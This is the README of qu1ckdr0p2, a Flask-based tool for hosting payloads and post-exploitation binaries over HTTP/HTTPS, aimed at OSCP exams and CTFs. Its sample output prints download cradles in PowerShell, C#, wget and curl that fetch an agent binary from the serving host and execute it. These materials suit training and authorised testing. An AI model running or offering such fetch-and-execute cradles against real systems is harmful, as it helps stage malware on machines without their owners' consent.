Qu1Ckdr0P2 | Quicky Serve Files Over Http Or Https Using Flask

Python Flask Visual Studio Code Prettier License: MIT

About

Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.

Pull requests and issues welcome. As are any contributions.

Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https option, priority is also given to the tun0 interface when the webserver is running, otherwise it will use eth0.

The common.ini defines the mapped aliases used within the --search and -u options.

When the webserver is running there are several download cradles printed to the screen to copy and paste.

NOTE

When you go to copy and paste a download cradle, depending on your terminal emulator of choice you may have to QUICKLY triple or double click the download cradle to highlight it for a copy. This will be fixed in a later version.

Install

Using pip is the only supported way of installing

Cloning this repository to install will probably break something

pip3 install qu1ckdr0p2 echo β€œalias serv=β€˜~/.local/bin/serv’” >> ~/.zshrc source ~/.zshrc or echo β€œalias serv=β€˜~/.local/bin/serv’” >> ~/.bashrc source ~/.bashrc serv init --update

Usage

Serv a single file located in your current working directory

$ serv serve -f implant.bin --https 443

$ serv serve -f file.example --http 8080

Update and help

$ serv --help Usage: serv [OPTIONS] COMMAND [ARGS]… Welcome to qu1ckdr0p2 entry point. Options: --debug Enable debug mode. --help Show this message and exit. Commands: init Perform updates. serve Serve files.

$ serv serve --help Usage: serv serve [OPTIONS] Serve files. Options: -l, --list List aliases -s, --search TEXT Search query for aliases -u, --use INTEGER Use an alias by a dynamic number -f, --file FILE Serve a file --http INTEGER Use HTTP with a custom port --https INTEGER Use HTTPS with a custom port -h, --help Show this message and exit.

$ serv init --help Usage: serv init [OPTIONS] Perform updates. Options: --update Check and download missing tools. --update-self Update the tool using pip. --update-self-test Used for dev testing, installs unstable build. --help Show this message and exit.

$ serv init --update

$ serv init --update-self

Serv a file from a mapped alias

The mapped alias numbers for the -u option are dynamic so you don’t have to remember specific numbers or ever type out a tool name.

$ serv serve --search ligolo [β†’] Path: ~/.qu1ckdr0p2/windows/agent.exe [β†’] Alias: ligolo_agent_win [β†’] Use: 1 [β†’] Path: ~/.qu1ckdr0p2/windows/proxy.exe [β†’] Alias: ligolo_proxy_win [β†’] Use: 2 [β†’] Path: ~/.qu1ckdr0p2/linux/agent [β†’] Alias: ligolo_agent_linux [β†’] Use: 3 [β†’] Path: ~/.qu1ckdr0p2/linux/proxy [β†’] Alias: ligolo_proxy_linux [β†’] Use: 4 (…)

$ serv serve --search ligolo -u 3 --http 80 [β†’] Serving: …/…/.qu1ckdr0p2/linux/agent [β†’] Protocol: http [β†’] IP address: 192.168.1.5 [β†’] Port: 80 [β†’] Interface: eth0 [β†’] CTRL+C to quit [β†’] URL: http://192.168.1.5:80/agent [↓] csharp: $webclient = New-Object System.Net.WebClient; $webclient.DownloadFile(β€˜http://192.168.1.5:80/agent’, β€˜c:\windows\temp\agent’); Start-Process β€˜c:\windows\temp\agent’ [↓] wget: wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent [↓] curl: curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent [↓] powershell: Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent β § Web server running

License

MIT

GitHub:

3 Likes